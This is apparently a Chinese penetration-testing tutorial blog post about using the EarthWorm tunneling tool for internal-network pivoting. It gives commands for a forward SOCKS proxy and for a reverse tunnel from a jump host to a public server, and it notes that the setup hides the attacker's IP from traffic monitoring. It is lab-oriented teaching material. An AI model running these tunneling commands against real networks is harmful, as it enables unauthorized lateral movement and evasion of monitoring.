内网渗透-内网隧道

一、EarthWorm的使用

内网穿透神器EarthWorm,(简称EW)是一套轻量便携且功能强大的网络穿透工具,基于标准C开发,具有socks5代理、端口转发、端口映射三大功能。相较于其他穿透工具,如reGeorg等,EarthWorm可以穿透更复杂的内网环境同时也不需要跳板机运行web服务,也可以支持多平台间的转接通讯,如Linux、Windows、MacOS、Arm-linux等。

下载地址:https://gitee.com/aveng/EarthWorm/tree/master/download和https://github.com/mrawb/ew/blob/master/ew_for_linux64,本工具目前已经不再更新,被封杀

1、正向代理

将EarthWorm在Windows2016上运行

ew_for_win_32.exe -s ssocksd -l 1080
-s:指定我们的代理的进程的名字
-l:指定我们端口号,1080是socks的默认端口

 这是一个独立的工具,和msf没有任何的关系,没有kali那边的msf给这边的木马下达指令,只需要在跳板机上把这个代理设置好了就行

 看看192.168.209.129可不可以访问,答案是不可以

然后我们要做的事情就是给这个浏览器配置一个代理 

这时候的代理服务器就不是本地了,而是Windows2016这台跳板机的了

 然后在再去访问,发现访问成功

2、反弹代理

由于我没有公网服务器,所以就用老师的电脑来进行实验

首先我们得先有一个公网服务器,然后进入到我们的公网

这是我们公网服务器的终端,然后进入到EarthWorm的目录底下

 

 在公网上启动一个服务端

./ew_for_linux64 -s rcsocks -l 8080 -e 8086  #确保8080和8086均是开放端口
8080是代理端口,8086是通信端口

然后执行

这是我们公网服务器中安全组开启的端口

接下来我们在windows2016跳板机上运行以下命令

ew_for_win_32.exe -s rssocks -d 47.96.116.171 -e 8086  建立与8086之间的通信,通信的目的是为了存储数据
指定公网的IP地址和通信端口

然后执行 

然后我们可以在公网服务器这儿看到没有报错,连接正常

接下来该如何做呢

再开一个终端看看端口情况,发现开了8080和8086端口

然后在Kali的浏览器上配置代理为公网IP的808端口

然后我们再去访问目标主机的phpinfo,相当于跳了两跳,从公网服务器跳到Windows2016这个跳板机上,然后再跳到windows7上

从windows7这个地方来监听流量看到的只是windows2016在访问

从windows2016这边看看能不能发现我们所在位置的IP

我们可以使用wireshark去监听流量,因为widows2016在和我们的公网进行通信,只能发现windows2016和公网之间的通信,没办法追踪我们所在位置的IP

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值